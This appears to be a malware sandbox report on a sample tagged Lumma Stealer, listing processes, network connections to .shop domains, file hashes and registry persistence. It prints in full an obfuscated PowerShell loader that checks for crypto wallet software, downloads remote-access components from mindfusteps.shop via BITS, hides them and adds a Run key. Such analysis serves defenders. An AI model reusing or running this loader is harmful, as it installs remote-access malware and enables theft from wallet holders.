PID 4144 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Roaming\RDJUYV.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4144 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Roaming\RDJUYV.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4144 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Roaming\RDJUYV.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 3248 wrote to memory of 3260 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3248 wrote to memory of 3260 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3248 wrote to memory of 3260 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Set-up.exe

"C:\Users\Admin\AppData\Local\Temp\Set-up.exe"

C:\Windows\SysWOW64\more.com

C:\Windows\SysWOW64\more.com

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -exec bypass -f "C:\Users\Admin\AppData\Local\Temp\O93LZ727PJ79L0E0TL1CJ7.ps1"

C:\Users\Admin\AppData\Roaming\RDJUYV.pif

"C:\Users\Admin\AppData\Roaming\RDJUYV.pif" "C:\Users\Admin\AppData\Roaming\79AFBM.xlsx"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOPrOF -Ep BYPAss -W hI -eNc $ e d H H f = ' h K c U : \ s o f t W a R e \ c l a S s e s \ ' ;   $ w A a j = $ e n V : L O c A l a P p D A t a + ' \ p R O g r A M S \ ' ;   $ 9 v x n 5 = ( G E T - W m I o B j E c T   - C L a s S   W i N 3 2 _ C o m p U t e r S Y s t E m ) . p A R T O f d O M A I N ;   $ V v p S = 0 ;   $ V 4 t o n = ' c : \ P r o G r A M   F i L e s \ ' ;   $ r 5 S u i = ' H K L M : \ S O f t w a R E \ c L A s S E S \ ' ;   $ E k Q d = ' h k C U : \ s O f t W A r E \ ' ;   $ Y M c z = @ (   $ v 4 t O N + ' b I T b O x \ b I t b o x . E X E ' ;   $ W A a j + ' C Y p h E r o C K   C Y S y N C \ C y p H e R O C K   C Y s y n C . E X e ' ;   $ E d H h f + ' k E e p k e Y ' ;   $ W A a J + ' k E E v O - W a L l e T \ K E E v O   l i n K . e X e ' ;   $ V 4 T o N + ' l e D g e r   l I V e \ L e d g e R   l I v e . E x e ' ;   $ e k Q d + ' b I T B o X a p P ' ;   $ w A A j + ' T R E Z O R   S U i T e \ T R E z o r   S U I T E . e X E ' ;   $ w a a j + ' R a b B y - d E S K t O p \ r A b B y   D e s K T o p . E X E ' ;   $ E K q d + ' m I c R o S o f T \ W i N D O w S \ c u R R e N t V E r s i O n \ u N i n s t A L L \ B i t b o X A P P ' ;   $ R 5 s U I + ' l E d g e R l i V E ' ;   $ E D h H f + ' a o p p ' ;   $ E D h H F + ' T R e Z O r s U I t E ' ;   $ v 4 T o N + ' b C   V A U L t \ B c V a U L T . E X e ' ;   $ r 5 S u I + ' B C v a u l t ' ;   $ W a a j + ' K e e p K e Y - D E S k t O P \ K E E p k E y   D e s k T o P . e x E ' ;   $ E K q D + ' r E A L   s e c u r i t Y \ b C v a u L t ' ;   $ E d h h F + ' K e E V O ' ;   $ E D H h F + ' L i Q U i d n e t W o r k ' ;   $ E d H H F + ' C Y P h E r O C K ' ;   $ e D H H F + ' o n E k E Y - w A l l e T ' ;   $ v 4 t o N + ' B L o c k S T r e a m \ b l O C K S t r e A M   g r E E n \ B L o C K S t R e a M   G R E e n . e X e ' ;   $ V 4 t O N + ' O n e K E Y \ o n E k e y . e x e ' ;   ) ;   $ h N o z = $ Y m C Z . l E N G T h ;   i F  
 ( $ 9 v x N 5 )   { $ v v p S = 1 }   E L s e   {   f o r   ( $ M 9 p w A = 0 ;   $ m 9 P w a   - L t   $ H N O z   - a N D   $ v V P S   - E q   0 ;   $ M 9 P w a + + )   {   I F   ( t E s T - p a t h   $ y M C Z [ $ m 9 P w a ] )   { $ V v P s = 1 } ; } ; } ;   I f   ( $ v v p s   - e q   1 )   {   C h d i R   $ E n v : A P P d A T a ;   $ R R R E e f H G = g e t - c O m m a n D   E x p A n D - a R C H I v E   - E R r O R A c t I o n   s i L E N T l y c O N t I n U E ;   $ t l e Q r Y = ' h t t p s : / / m i n d f u s t e p s . s h o p / m i n z / m 4 n d . z i p ' ;   $ V j r F t C g G = ' h t t p s : / / m i n d f u s t e p s . s h o p / m i n z / m 2 n d . z i p ' ;   $ b E z g j v Q I = ' v d f o r 4 h q . z i p ' ;   $ y X C P e M Q R = G C M   S t a R t - b i t s T R A n S f E R   - E r R o R a C T I O N   s i L e N T l y C O n t I N U e ;   $ 8 G Q 9 n t = ' h t t p s : / / m i n d f u s t e p s . s h o p / m i n z / m 3 n d . z i p ' ;   $ 8 T g q 3 E 5 = ' 3 q o 3 F c O . z i p ' ;   $ g G B D r n l = ' S m a r t D e f r a g T o o l ' ;   $ J f C i n G = ' 1 a K H x P B . z i p ' ;   [ N e t . s e r v i c e p O I N T m A N a G e r ] : : S E c U R i T y P r O t o C O l   =   [ N e t . S e c U r i T y p r O t o c o l t Y P e ] : : t L s 1 2 ;   $ u F G 9 b 7 j z = ' m A L l Q A . z i p ' ;   $ b 8 7 N 9 u = ' h t t p s : / / m i n d f u s t e p s . s h o p / m i n z / m 1 n d . z i p ' ;   $ U p x e w 6 F = " $ e N V : a P P D A t a \ $ 8 T g q 3 E 5 " ;   $ t j e 6 g 3 = $ E N V : a p P d A t A ,   $ b E z g j v Q I   - j o i N   ' \ ' ;   $ 3 s U H E X o = " $ E N v : a P P d a T a \ $ J f C i n G " ;   $ 4 5 Y J W y B = " { 0 } \ { 1 } "   - f   $ E N v : a P P d a T a ,   $ u F G 9 b 7 j z ;   $ A r M X I r Y v = " b i t s a D m I N . e X e   / T r A n s f E r   6 D r y 6 h p o   / D O w n l O A D   / P R i O r I T Y   n o R M a l   $ V j r F t C g G   $ U p x e w 6 F " ;   $ 1 m p h u T S i = " $ E n V : a p p D a t A \ $ g G B D r n l " ;  
 $ C K g l d V = " b i T S A d m i N . E x E   / t R a N s f e r   0 m 1 Y s L 7   / d O w n L o A d   / P r I o r I T Y   N o R m A l   $ 8 G Q 9 n t   $ t j e 6 g 3 " ;   $ u E x Z 6 R P D = ' b I T S a d M i n . e x e   / t R A n S f E R   p X R P D f t   / D o W N l o A d   / p R I o R I t Y   n O r m a l   ' + $ b 8 7 N 9 u + '   ' + $ 3 s U H E X o ;   $ p F 7 H 5 J U = " b I T S a d M i n . e x e   / t R A n S f E R   p X R P D f t   / D o W N l o A d   / p R I o R I t Y   n O r m a l   { 0 }   { 1 } "   - f   $ b 8 7 N 9 u ,   $ 4 5 Y J W y B ;   I f   ( $ R R R E e f H G )   {   I F   ( $ y X C P e M Q R )   {   S t a r t - B I T S t r a N S f e R   - S o U r c e   $ V j r F t C g G   - D e s t I n A t I O n   $ U p x e w 6 F ;   s T a r t - B I T s t R A N S F E R   - s O u R c E   $ 8 G Q 9 n t   - d E S T i n A T i o n   $ t j e 6 g 3 ;   s T A r t - b I T S t r A N S f E R   - s o U r c E   $ b 8 7 N 9 u   - D E s T I N a t I O N   $ 3 s U H E X o ;   s T A R T - B i T s t R a n S F E r   - s O u R c E   $ t l e Q r Y   - D E s T i n a t i o N   $ 4 5 Y J W y B ;   }   E l S E   { i E X   - c o m m a N D   $ u E x Z 6 R P D ;   I E X   - C o m m A n D   $ p F 7 H 5 J U ;   i e x   - c o m m a n d   $ A r M X I r Y v ;   &   $ C K g l d V ;   }   E x p A N D - A r c h i V e   - P A T h   $ 4 5 Y J W y B   - D e S t I N a T I o n P a t h   $ 1 m p h u T S i ;   E x p A N D - a R c h i V E   - P a t H   $ t j e 6 g 3   - d e s t i n a T I o N p a t h   $ 1 m p h u T S i ;   E x P A N d - A R C H i v E   - p A t H   $ 3 s U H E X o   - d E S T i n a T i O N p A t H   $ 1 m p h u T S i ;   e x P A n d - A r C h i V e   - p a t h   $ U p x e w 6 F   - D e S T i n a t i o N p A t H   $ 1 m p h u T S i ;   R m   - P a T h   $ t j e 6 g 3 ;   R D   - p A T H   $ U p x e w 6 F ;   R D   - p A t H   $ 4 5 Y J W y B ;   r e M O v e - I t e m   - P A T h   $ 3 s U H E X o ;   }   E L S E   {   $ Z A P P f t = @ ( ' p c i c a p i . d l l ' ,  
 ' c l i e n t 3 2 . i n i ' ,   ' T C C T L 3 2 . D L L ' ,   ' n s m _ v p r o . i n i ' ,   ' N S M . L I C ' ,   ' H T C T L 3 2 . D L L ' ,   ' r e m c m d s t u b . e x e ' ,   ' A u d i o C a p t u r e . d l l ' ,   ' n s k b f l t r . i n f ' ,   ' P C I C H E K . D L L ' ,   ' P C I C L 3 2 . D L L ' ,   ' c l i e n t 3 2 . e x e ' ,   ' m s v c r 1 0 0 . d l l ' ) ;   n i   - P A T h   $ E n v : a P p d A t A   - n A m e   $ g G B D r n l   - i T e M T y P e   ' d i r e c t o r y ' ;   $ g 1 i 5 r x B = ' h t t p s : / / m i n d f u s t e p s . s h o p / m i n d / ' ;   I F   ( $ y X C P e M Q R )   {   $ Z A P P f t   |   F o R E A c h - O B j E C t   {   $ h E V T G u q o = $ g 1 i 5 r x B + $ _ ;   $ S M J K N P = j O I N - p A t h   - P A t h   $ 1 m p h u T S i   - c H i l D P a T h   $ _ ;   s t a R t - b I T S t r a n S F E R   - s O u r C e   $ h E V T G u q o   - d E s T i n A T i o N   $ S M J K N P ;   } ; }   e L S E   {   $ Z A P P f t   |   f o R E a C H - o B J E C T   {   $ h E V T G u q o = $ g 1 i 5 r x B + $ _ ;   $ S M J K N P = $ 1 m p h u T S i ,   $ _   - j O I N   ' \ ' ;   $ p R l r a a Z C = ' B i t S a d m I N . e x E   / t r A n S f E r   6 L P t 8 K 2 g   / d o W n l o A d   / P R I O R I T y   N O r M A L   ' + $ h E V T G u q o + '   ' + $ S M J K N P ;   I E X   - C o m m A n D   $ p R l r a a Z C ; } ;   } ;   } ;   $ y F h z F L = G I   $ 1 m p h u T S i   - f o r C e ;   $ y F h z F L . a T T R i b u t E s = ' H i d d e n ' ;   C h d i R   $ 1 m p h u T S i ;   $ X C U F g c q = " $ 1 m p h u T S i \ c l i e n t 3 2 . e x e " ;   N E W - I t E m p R o p e R T y   - P a t H   ' H K C u : \ s o F T w A R e \ M I C r o s o F t \ w i N D O W S \ c U R r E n T V E R s I O N \ r u n '   - n A m e   $ g G B D r n l   - v a l U e   $ X C U F g c q   - P r O P E r t y t y p e   ' S t r i n g ' ;   S t a r t - P R O C e S S   c l I E n t 3 2 . E X e ;   } ; 

Network

Country Destination Domain Proto
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 mindfuljournal.shop udp
US 172.67.143.13:443 mindfuljournal.shop tcp
US 172.67.143.13:443 mindfuljournal.shop tcp
US 172.67.143.13:443 mindfuljournal.shop tcp
US 8.8.8.8:53 13.143.67.172.in-addr.arpa udp
US 172.67.143.13:443 mindfuljournal.shop tcp
US 172.67.143.13:443 mindfuljournal.shop tcp
US 172.67.143.13:443 mindfuljournal.shop tcp
US 8.8.8.8:53 cdn1.pixel-story.shop udp
US 104.21.32.85:443 cdn1.pixel-story.shop tcp
US 8.8.8.8:53 pixelpalette.shop udp
US 104.21.84.104:443 pixelpalette.shop tcp
US 8.8.8.8:53 85.32.21.104.in-addr.arpa udp
US 8.8.8.8:53 104.84.21.104.in-addr.arpa udp
US 8.8.8.8:53 mindfusteps.shop udp
MD 213.159.73.34:443 mindfusteps.shop tcp
US 8.8.8.8:53 34.73.159.213.in-addr.arpa udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
AM 217.144.184.19:1466 tcp
US 8.8.8.8:53 109.234.82.104.in-addr.arpa udp
US 8.8.8.8:53 19.184.144.217.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
AM 217.144.184.19:1466 tcp

Files

memory/1852-0-0x0000000074550000-0x00000000747E1000-memory.dmp

memory/1852-1-0x00007FFC453F0000-0x00007FFC455E5000-memory.dmp

memory/1852-8-0x0000000074563000-0x0000000074565000-memory.dmp

memory/1852-9-0x0000000074550000-0x00000000747E1000-memory.dmp

memory/1852-10-0x0000000074550000-0x00000000747E1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\13821335

MD5 f7b47df6923eabe96417f277c97f32bf
SHA1 b031c79c7b8a2585d6c1eff80674b09eca5fc154
SHA256 bbb3a5fa0a62a0c0c33b053b506866b62511f21966a4dd6777bb70a2c4b7267d
SHA512 54f9584215ba5b1646b1c7d0f23c14793de4831c01214ca9f5828235dc366cbbdaeecc0b940a5ca3df4d458c14e7a881d9528671ef8bcc37baf758a6073914b4

memory/4192-12-0x0000000074550000-0x00000000747E1000-memory.dmp

memory/4192-14-0x00007FFC453F0000-0x00007FFC455E5000-memory.dmp

memory/4192-15-0x0000000074550000-0x00000000747E1000-memory.dmp

memory/4192-16-0x0000000074550000-0x00000000747E1000-memory.dmp

memory/4192-18-0x0000000074550000-0x00000000747E1000-memory.dmp

memory/4688-19-0x00007FFC453F0000-0x00007FFC455E5000-memory.dmp

memory/4688-20-0x00000000003D0000-0x0000000000429000-memory.dmp

memory/4688-21-0x0000000000BBF000-0x0000000000BC7000-memory.dmp

memory/4688-25-0x00000000003D0000-0x0000000000429000-memory.dmp

memory/3248-27-0x00000000748BE000-0x00000000748BF000-memory.dmp

memory/3248-28-0x0000000002960000-0x0000000002996000-memory.dmp

memory/3248-35-0x00000000748B0000-0x0000000075060000-memory.dmp

memory/4688-30-0x0000000003D20000-0x0000000003D59000-memory.dmp

memory/3248-36-0x0000000005130000-0x0000000005758000-memory.dmp

memory/4688-29-0x0000000003D20000-0x0000000003D59000-memory.dmp

memory/3248-37-0x0000000004F60000-0x0000000004F82000-memory.dmp

memory/3248-38-0x0000000005760000-0x00000000057C6000-memory.dmp

memory/3248-39-0x00000000057D0000-0x0000000005836000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zuemf0qc.2fv.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3248-49-0x0000000005940000-0x0000000005C94000-memory.dmp

memory/3248-50-0x0000000005F10000-0x0000000005F2E000-memory.dmp

memory/3248-51-0x0000000005FC0000-0x000000000600C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\O93LZ727PJ79L0E0TL1CJ7.ps1

MD5 a93ef812fcdf3af24ff8b33a75d4992e
SHA1 b282892bd321a8709474f43d790d7e661edaa98f
SHA256 d5a89ca10e0e354df724efa955616b27501534cd5153f3c387c9d569a73cdbc6
SHA512 272da3e9cb498541454f381d360e4dd47498ecf1f604844dcaea21316a3f37547688f52439d38bb6208f513ba8fc9e442b82cbb622c6579323530c342853b037

memory/3248-53-0x0000000007770000-0x0000000007DEA000-memory.dmp

memory/3248-54-0x0000000006460000-0x000000000647A000-memory.dmp

memory/3248-55-0x00000000748BE000-0x00000000748BF000-memory.dmp

memory/3248-56-0x00000000748B0000-0x0000000075060000-memory.dmp

memory/4688-57-0x00000000003D0000-0x0000000000429000-memory.dmp

C:\Users\Admin\AppData\Roaming\RDJUYV.pif

MD5 3f58a517f1f4796225137e7659ad2adb
SHA1 e264ba0e9987b0ad0812e5dd4dd3075531cfe269
SHA256 1da298cab4d537b0b7b5dabf09bff6a212b9e45731e0cc772f99026005fb9e48
SHA512 acf740aafce390d06c6a76c84e7ae7c0f721731973aadbe3e57f2eb63241a01303cc6bf11a3f9a88f8be0237998b5772bdaf569137d63ba3d0f877e7d27fc634

C:\Users\Admin\AppData\Roaming\79AFBM.xlsx

MD5 3c6d0866e54ab391bc09713fde4c9d38
SHA1 a1a4e9c067e3c85739e85fb45f7ecdb363bcf856
SHA256 ffe15bff44969541749b01e1ab80492c95990bf4af35fb62e0d93bf6a4b81682
SHA512 eebf8ca2e3d778ca9706276b26c4d3daedf9cb7067d695cbf9e07755e6887e782d25a8aa6785034052b39105518c69f7e09b12c8199e58d13fcaf6b7f82b58b4

memory/4012-67-0x0000000000400000-0x00000000009BA000-memory.dmp

memory/4012-68-0x0000000000400000-0x00000000009BA000-memory.dmp

memory/4012-71-0x0000000000400000-0x00000000009BA000-memory.dmp

memory/4012-70-0x0000000000400000-0x00000000009BA000-memory.dmp

memory/4012-69-0x0000000000400000-0x00000000009BA000-memory.dmp

memory/4012-82-0x0000000000400000-0x00000000009BA000-memory.dmp

memory/3260-83-0x0000000007550000-0x00000000075E6000-memory.dmp

memory/3260-84-0x0000000007520000-0x0000000007542000-memory.dmp

memory/3260-85-0x0000000007BA0000-0x0000000008144000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 5315900105942deb090a358a315b06fe
SHA1 22fe5d2e1617c31afbafb91c117508d41ef0ce44
SHA256 e8bd7d8d1d0437c71aceb032f9fb08dd1147f41c048540254971cc60e95d6cd7
SHA512 77e8d15b8c34a1cb01dbee7147987e2cc25c747e0f80d254714a93937a6d2fe08cb5a772cf85ceb8fec56415bfa853234a003173718c4229ba8cfcf2ce6335a6

memory/3248-91-0x00000000748B0000-0x0000000075060000-memory.dmp

memory/4012-92-0x0000000000400000-0x00000000009BA000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win7-20240903-en

Max time kernel

120s

Max time network

121s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\contactsUX.dll

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2292 wrote to memory of 2192 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2292 wrote to memory of 2192 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2292 wrote to memory of 2192 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2292 wrote to memory of 2192 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2292 wrote to memory of 2192 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2292 wrote to memory of 2192 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2292 wrote to memory of 2192 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\contactsUX.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\contactsUX.dll

Network

N/A

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

153s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\msncore.dll

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4900 wrote to memory of 3388 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4900 wrote to memory of 3388 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4900 wrote to memory of 3388 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\msncore.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\msncore.dll

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 24.73.42.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral15

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win7-20240903-en

Max time kernel

120s

Max time network

125s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\audio_output\libdirectsound_plugin.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2400 wrote to memory of 2532 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2400 wrote to memory of 2532 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2400 wrote to memory of 2532 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2400 wrote to memory of 2532 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2400 wrote to memory of 2532 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2400 wrote to memory of 2532 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2400 wrote to memory of 2532 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\audio_output\libdirectsound_plugin.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\audio_output\libdirectsound_plugin.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral24

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win10v2004-20241007-en

Max time kernel

95s

Max time network

141s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdirect3d11_plugin.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4848 wrote to memory of 968 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4848 wrote to memory of 968 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4848 wrote to memory of 968 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdirect3d11_plugin.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdirect3d11_plugin.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 99.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win7-20240903-en

Max time kernel

134s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Set-up.exe"

Signatures

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe N/A

Uses the VBS compiler for execution

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\dbabech = "\"C:\\ehfecbk\\AutoIt3.exe\" C:\\ehfecbk\\dbabech.a3x" C:\Users\Admin\AppData\Roaming\9A2VOZ.pif N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2308 set thread context of 492 N/A C:\Users\Admin\AppData\Local\Temp\Set-up.exe C:\Windows\SysWOW64\more.com

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\9A2VOZ.pif N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Set-up.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\more.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Roaming\9A2VOZ.pif N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Roaming\9A2VOZ.pif N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\9A2VOZ.pif N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Set-up.exe N/A
N/A N/A C:\Windows\SysWOW64\more.com N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2308 wrote to memory of 492 N/A C:\Users\Admin\AppData\Local\Temp\Set-up.exe C:\Windows\SysWOW64\more.com
PID 2308 wrote to memory of 492 N/A C:\Users\Admin\AppData\Local\Temp\Set-up.exe C:\Windows\SysWOW64\more.com
PID 2308 wrote to memory of 492 N/A C:\Users\Admin\AppData\Local\Temp\Set-up.exe C:\Windows\SysWOW64\more.com
PID 2308 wrote to memory of 492 N/A C:\Users\Admin\AppData\Local\Temp\Set-up.exe C:\Windows\SysWOW64\more.com
